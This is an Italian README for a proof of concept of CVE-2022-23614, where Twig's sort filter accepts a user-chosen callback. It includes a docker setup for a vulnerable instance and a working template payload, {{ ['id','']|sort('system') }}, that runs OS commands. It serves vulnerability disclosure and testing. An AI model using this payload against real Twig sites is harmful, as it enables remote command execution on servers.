
PoC per CVE-2022-23614 (filtro sort di Twig: esecuzione di codice/bypass della sandbox)
Prova di concetto per CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Esecuzione di codice / bypass sandbox del filtro sort di Twig)
Come si vede in questo commit - https://github.com/twigphp/Twig/commit/.., twig stava passando il nome di funzione fornito dall'utente come parametro callback a uasort (qui), portando quindi a esecuzione arbitraria di codice
Per costruire ed eseguire il container docker con una versione vulnerabile di twig
$ ./build-docker.sh
Apri la pagina web su localhost:1337 e prova a renderizzare il seguente payload
{{ ['id','']|sort('system') }}
PoC

Risultato
